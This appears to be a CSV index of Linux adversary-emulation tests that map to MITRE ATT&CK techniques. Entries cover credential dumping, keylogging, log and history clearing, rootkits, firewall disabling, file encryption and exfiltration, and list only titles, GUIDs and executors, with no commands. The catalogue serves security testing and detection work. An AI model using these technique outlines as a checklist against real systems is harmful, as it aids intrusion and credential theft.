credential-access,T1056.001,Input Capture: Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
credential-access,T1056.001,Input Capture: Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO Brute Force - Debian,ba1bf0b6-f32b-4db0-b7cc-d78cacc76700,bash
credential-access,T1110.001,Brute Force: Password Guessing,6,SUDO Brute Force - Redhat,4097bc00-5eeb-4d56-aaf9-287d60351d95,bash
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,3,Capture Passwords with MimiPenguin,a27418de-bdce-4ebd-b655-38f04842bf0c,bash
credential-access,T1040,Network Sniffing,1,Packet Capture Linux using tshark or tcpdump,7fe741f7-b265-4951-a7c7-320889083b3e,bash
credential-access,T1040,Network Sniffing,9,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo",10c710c9-9104-4d5f-8829-5b65391e2a29,bash
credential-access,T1040,Network Sniffing,10,"Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo",7a0895f0-84c1-4adf-8491-a21510b1d4c1,bash
credential-access,T1040,Network Sniffing,11,"Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo",515575ab-d213-42b1-aa64-ef6a2dd4641b,bash
credential-access,T1040,Network Sniffing,12,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo",b1cbdf8b-6078-48f5-a890-11ea19d7f8e9,bash
credential-access,T1552,Unsecured Credentials,1,AWS - Retrieve EC2 Password Data using stratus,a21118de-b11e-4ebd-b655-42f11142df0c,sh
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,9,LaZagne.py - Dump Credentials from Firefox Browser,87e88698-621b-4c45-8a89-4eaebdeaabb1,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,5,Copy the users GnuPG directory with rsync,2a5a0601-f5fb-4e2e-aa09-73282ae6afca,sh
credential-access,T1552.003,Unsecured Credentials: Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,1,Find AWS credentials,2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,3,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,6,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
credential-access,T1110.004,Brute Force: Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash
credential-access,T1003.008,OS Credential Dumping: /etc/passwd and /etc/shadow,1,Access /etc/shadow (Local),3723ab77-c546-403c-8fb4-bb577033b235,bash
credential-access,T1003.008,OS Credential Dumping: /etc/passwd and /etc/shadow,2,Access /etc/passwd (Local),60e860b6-8ae6-49db-ad07-5e73edd88f5d,sh
credential-access,T1003.008,OS Credential Dumping: /etc/passwd and /etc/shadow,3,"Access /etc/{shadow,passwd} with a standard bin that's not cat",df1a55ae-019d-4120-bc35-94f4bc5c4b0a,bash
credential-access,T1003.008,OS Credential Dumping: /etc/passwd and /etc/shadow,4,"Access /etc/{shadow,passwd} with shell builtins",f5aa6543-6cb2-4fae-b9c2-b96e14721713,bash
discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
discovery,T1087.001,Account Discovery: Local Account,1,Enumerate all accounts (Local),f8aab3dd-5990-4bf8-b8ab-2226c951696f,sh
discovery,T1087.001,Account Discovery: Local Account,2,View sudoers access,fed9be70-0186-4bde-9f8a-20945f9370c2,sh
discovery,T1087.001,Account Discovery: Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
discovery,T1087.001,Account Discovery: Local Account,4,List opened files by user,7e46c7a5-0142-45be-a858-1a3ecb4fd3cb,sh
discovery,T1087.001,Account Discovery: Local Account,5,Show if a user account has ever logged in remotely,0f0b6a29-08c3-44ad-a30b-47fd996b2110,sh
discovery,T1087.001,Account Discovery: Local Account,6,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
discovery,T1007,System Service Discovery,3,System Service Discovery - systemctl,f4b26bce-4c2c-46c0-bcc5-fce062d38bef,bash
discovery,T1040,Network Sniffing,1,Packet Capture Linux using tshark or tcpdump,7fe741f7-b265-4951-a7c7-320889083b3e,bash
discovery,T1040,Network Sniffing,9,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo",10c710c9-9104-4d5f-8829-5b65391e2a29,bash
discovery,T1040,Network Sniffing,10,"Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo",7a0895f0-84c1-4adf-8491-a21510b1d4c1,bash
discovery,T1040,Network Sniffing,11,"Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo",515575ab-d213-42b1-aa64-ef6a2dd4641b,bash
discovery,T1040,Network Sniffing,12,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo",b1cbdf8b-6078-48f5-a890-11ea19d7f8e9,bash
discovery,T1135,Network Share Discovery,2,Network Share Discovery - linux,875805bc-9e86-4e87-be86-3a5527315cae,bash
discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh
discovery,T1082,System Information Discovery,4,Linux VM Check via Hardware,31dad7ad-2286-4c02-ae92-274418c85fec,bash
discovery,T1082,System Information Discovery,5,Linux VM Check via Kernel Modules,8057d484-0fae-49a4-8302-4812c4f1e64e,bash
discovery,T1082,System Information Discovery,7,Hostname Discovery,486e88ea-4f56-470f-9b57-3f4d73f39133,bash
discovery,T1082,System Information Discovery,11,Environment variables discovery on macos and linux,fcbdd43f-f4ad-42d5-98f3-0218097e2720,sh
discovery,T1082,System Information Discovery,24,Linux List Kernel Modules,034fe21c-3186-49dd-8d5d-128b35f181c7,sh
discovery,T1217,Browser Bookmark Discovery,1,List Mozilla Firefox Bookmark Database Files on Linux,3a41f169-a5ab-407f-9269-abafdb5da6c2,sh
discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
discovery,T1069.001,Permission Groups Discovery: Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh
discovery,T1201,Password Policy Discovery,1,Examine password complexity policy - Ubuntu,085fe567-ac84-47c7-ac4c-2688ce28265b,bash
discovery,T1201,Password Policy Discovery,2,Examine password complexity policy - CentOS/RHEL 7.x,78a12e65-efff-4617-bc01-88f17d71315d,bash
discovery,T1201,Password Policy Discovery,3,Examine password complexity policy - CentOS/RHEL 6.x,6ce12552-0adb-4f56-89ff-95ce268f6358,bash
discovery,T1201,Password Policy Discovery,4,Examine password expiration policy - All Linux,7c86c55c-70fa-4a05-83c9-3aa19b145d1a,bash
discovery,T1614.001,System Location Discovery: System Language Discovery,3,Discover System Language with locale,837d609b-845e-4519-90ce-edc3b4b0e138,sh
discovery,T1614.001,System Location Discovery: System Language Discovery,4,Discover System Language with localectl,07ce871a-b3c3-44a3-97fa-a20118fdc7c9,sh
discovery,T1614.001,System Location Discovery: System Language Discovery,5,Discover System Language by locale file,5d7057c9-2c8a-4026-91dd-13b5584daa69,sh
discovery,T1614.001,System Location Discovery: System Language Discovery,6,Discover System Language by Environment Variable Query,cb8f7cdc-36c4-4ed0-befc-7ad7d24dfd7a,sh
discovery,T1518.001,Software Discovery: Security Software Discovery,4,Security Software Discovery - ps (Linux),23b91cd2-c99c-4002-9e41-317c63e024a2,sh
discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh
discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
discovery,T1018,Remote System Discovery,12,Remote System Discovery - ip neighbour,158bd4dd-6359-40ab-b13c-285b9ef6fa25,sh
discovery,T1018,Remote System Discovery,13,Remote System Discovery - ip route,1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1,sh
discovery,T1018,Remote System Discovery,14,Remote System Discovery - ip tcp_metrics,6c2da894-0b57-43cb-87af-46ea3b501388,sh
discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
impact,T1531,Account Access Removal,4,Change User Password via passwd,3c717bf3-2ecc-4d79-8ac8-0bfbf08fbce6,sh
impact,T1486,Data Encrypted for Impact,1,Encrypt files using gpg (Linux),7b8ce084-3922-4618-8d22-95f996173765,bash
impact,T1486,Data Encrypted for Impact,2,Encrypt files using 7z (Linux),53e6735a-4727-44cc-b35b-237682a151ad,bash
impact,T1486,Data Encrypted for Impact,3,Encrypt files using ccrypt (Linux),08cbf59f-85da-4369-a5f4-049cffd7709f,bash
impact,T1486,Data Encrypted for Impact,4,Encrypt files using openssl (Linux),142752dc-ca71-443b-9359-cf6f497315f1,bash
impact,T1496,Resource Hijacking,1,macOS/Linux - Simulate CPU Load with Yes,904a5a0e-fb02-490d-9f8d-0e256eb37549,bash
impact,T1485,Data Destruction,2,macOS/Linux - Overwrite file with DD,38deee99-fd65-4031-bec8-bfa4f9f26146,bash
impact,T1529,System Shutdown/Reboot,3,Restart System via `shutdown` - macOS/Linux,6326dbc4-444b-4c04-88f4-27e94d0327cb,bash
impact,T1529,System Shutdown/Reboot,4,Shutdown System via `shutdown` - macOS/Linux,4963a81e-a3ad-4f02-adda-812343b351de,bash
impact,T1529,System Shutdown/Reboot,5,Restart System via `reboot` - macOS/Linux,47d0b042-a918-40ab-8cf9-150ffe919027,bash
impact,T1529,System Shutdown/Reboot,6,Shutdown System via `halt` - Linux,918f70ab-e1ef-49ff-bc57-b27021df84dd,bash
impact,T1529,System Shutdown/Reboot,7,Reboot System via `halt` - Linux,78f92e14-f1e9-4446-b3e9-f1b921f2459e,bash
impact,T1529,System Shutdown/Reboot,8,Shutdown System via `poweroff` - Linux,73a90cd2-48a2-4ac5-8594-2af35fa909fa,bash
impact,T1529,System Shutdown/Reboot,9,Reboot System via `poweroff` - Linux,61303105-ff60-427b-999e-efb90b314e41,bash
execution,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
execution,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
execution,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
execution,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
execution,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
execution,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,3,Harvest SUID executable files,46274fc6-08a7-4956-861b-24cbbaa0503c,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,4,LinEnum tool execution,a2b35a63-9df1-4806-9a4d-5fe0500845f2,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,5,New script file in the tmp directory,8cd1947b-4a54-41fb-b5ea-07d0ace04f81,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,6,What shell is running,7b38e5cc-47be-44f0-a425-390305c76c17,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,7,What shells are available,bf23c7dc-1004-4949-8262-4c1d1ef87702,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,8,Command line scripts,b04ed73c-7d43-4dc8-b563-a2fc595cba1a,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,9,Obfuscated command line scripts,5bec4cc8-f41e-437b-b417-33ff60acf9af,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,10,Change login shell,c7ac59cb-13cc-4622-81dc-6d2fee9bfac7,bash
execution,T1059.004,Command and Scripting Interpreter: Bash,11,Environment variable scripts,bdaebd56-368b-4970-a523-f905ff4a8a51,bash
execution,T1059.004,Command and Scripting Interpreter: Bash,12,Detecting pipe-to-shell,fca246a8-a585-4f28-a2df-6495973976a1,bash
execution,T1059.006,Command and Scripting Interpreter: Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh
execution,T1059.006,Command and Scripting Interpreter: Python,2,Execute Python via scripts (Linux),6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh
execution,T1059.006,Command and Scripting Interpreter: Python,3,Execute Python via Python executables (Linux),0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh
execution,T1059.006,Command and Scripting Interpreter: Python,4,Python pty module and spawn function used to spawn sh or bash,161d694c-b543-4434-85c3-c3a433e33792,bash
execution,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
initial-access,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,10,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,2,Exfiltrate data HTTPS using curl linux,4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01,bash
exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,3,Exfiltration Over Alternative Protocol - DNS,c403b5a4-b5fc-49f2-b181-d1c80d27db45,manual
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,8,Python3 http.server,3ea1f938-f80a-4305-9aa8-431bc4867313,sh
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,3,chmod - Change file or folder mode (numeric mode) recursively,ea79f937-4a4d-4348-ace6-9916aec453a4,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,4,chmod - Change file or folder mode (symbolic mode) recursively,0451125c-b5f6-488f-993b-5a32b09f7d8f,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,5,chown - Change file or folder ownership and group,d169e71b-85f9-44ec-8343-27093ff3dfc0,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,6,chown - Change file or folder ownership and group recursively,b78598be-ff39-448f-a463-adbf2a5b7848,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,10,Chmod through c script,973631cf-6680-4ffa-a053-045e1b6b67ab,sh
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,11,Chown through c script,18592ba1-5f88-4e3c-abc8-ab1c6042e389,sh
defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
defense-evasion,T1014,Rootkit,3,dynamic-linker based rootkit (libprocesshider),1338bf0c-fd0c-48c0-9e65-329f18e2c0d3,sh
defense-evasion,T1014,Rootkit,4,Loadable Kernel Module based Rootkit (Diamorphine),0b996469-48c6-46e2-8155-a17f8b6c2247,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,13,Delete system journal logs via rm and journalctl utilities,ca50dd85-81ff-48ca-92e1-61f119cb1dcf,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,14,Overwrite Linux Mail Spool,1602ff76-ed7f-4c94-b550-2f727b4782d4,bash
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,15,Overwrite Linux Log,d304b2dc-90b4-4465-a650-16ddd503f7b5,bash
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,4,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,5,Clear Bash history (truncate),47966a1d-df4f-4078-af65-db6d9aa20739,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,8,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,9,Disable Bash History Logging with SSH -T,5f8abd62-f615-43c5-b6be-f780f25790a1,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,3,Base64 decoding with Python,356dc0e8-684f-4428-bb94-9313998ad608,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding with Perl,6604d964-b9f6-4d4b-8ce8-499829a14d0a,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,7,Linux Base64 Encoded Shebang in CLI,3a15c372-67c1-4430-ac8e-ec06d641ce4d,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,8,XOR decoding and command execution using Python,c3b65cd5-ee51-4e98-b6a3-6cbdec138efc,bash
defense-evasion,T1562,Impair Defenses,2,Disable journal logging via systemctl utility,c3a377f9-1203-4454-aa35-9d391d34768f,sh
defense-evasion,T1562,Impair Defenses,3,Disable journal logging via sed utility,12e5551c-8d5c-408e-b3e4-63f53b03379f,sh
defense-evasion,T1070.008,Email Collection: Mailbox Manipulation,2,Copy and Delete Mailbox Data on Linux,25e2be0e-96f7-4417-bd16-a4a2500e3802,bash
defense-evasion,T1070.008,Email Collection: Mailbox Manipulation,5,Copy and Modify Mailbox Data on Linux,6d99f93c-da56-49e3-b195-163090ace4f6,bash
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,4,Modify file timestamps using reference file,631ea661-d661-44b0-abdb-7a7f3fc08e50,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,7,Stop/Start UFW firewall,fe135572-edcd-49a2-afe6-1d39521c5a9a,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,8,Stop/Start UFW firewall systemctl,9fd99609-1854-4f3c-b47b-97d9a5972bd1,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,9,Turn off UFW logging,8a95b832-2c2a-494d-9cb0-dc9dd97c8bad,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,10,Add and delete UFW firewall rules,b2563a4e-c4b8-429c-8d47-d5bcb227ba7a,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,11,Edit UFW firewall user.rules file,beaf815a-c883-4194-97e9-fdbbb2bbdd7c,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,12,Edit UFW firewall ufw.conf file,c1d8c4eb-88da-4927-ae97-c7c25893803b,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,13,Edit UFW firewall sysctl.conf file,c4ae0701-88d3-4cd8-8bce-4801ed9f97e4,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,14,Edit UFW firewall main configuration file,7b697ece-8270-46b5-bbc7-6b9e27081831,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,15,Tail the UFW firewall log file,419cca0c-fa52-4572-b0d7-bc7c6f388a27,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,16,Disable iptables,7784c64e-ed0b-4b65-bf63-c86db229fd56,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,17,Modify/delete iptables firewall rules,899a7fb5-d197-4951-8614-f19ac4a73ad4,sh
defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,2,Pad Binary to Change Hash using truncate command - Linux/macOS,e22a9e89-69c7-410f-a473-e6c212cd2292,sh
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,4,Make and modify capabilities of a binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,5,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,6,Do reconnaissance for files that have the setuid bit set,8e36da01-cd29-45fd-be72-8a0fcaad4481,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,7,Do reconnaissance for files that have the setgid bit set,3fb46e17-f337-4c14-9f9a-a471946533e2,sh
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,1,Auditing Configuration Changes on Linux Host,212cfbcf-4770-4980-bc21-303e37abd0e3,bash
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,2,Logging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash
defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,3,linux rename /proc/pid/comm using prctl,f0e3aaea-5cd9-4db6-a077-631dd19b27a8,sh
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,3,Clear bash history,878794f7-c511-4199-a950-8c28b3ed8e5b,bash
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,4,Setting the HISTCONTROL environment variable,10ab786a-028e-4465-96f6-9e83ca6c5f24,bash
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,5,Setting the HISTFILESIZE environment variable,5cafd6c1-2f43-46eb-ac47-a5301ba0a618,bash
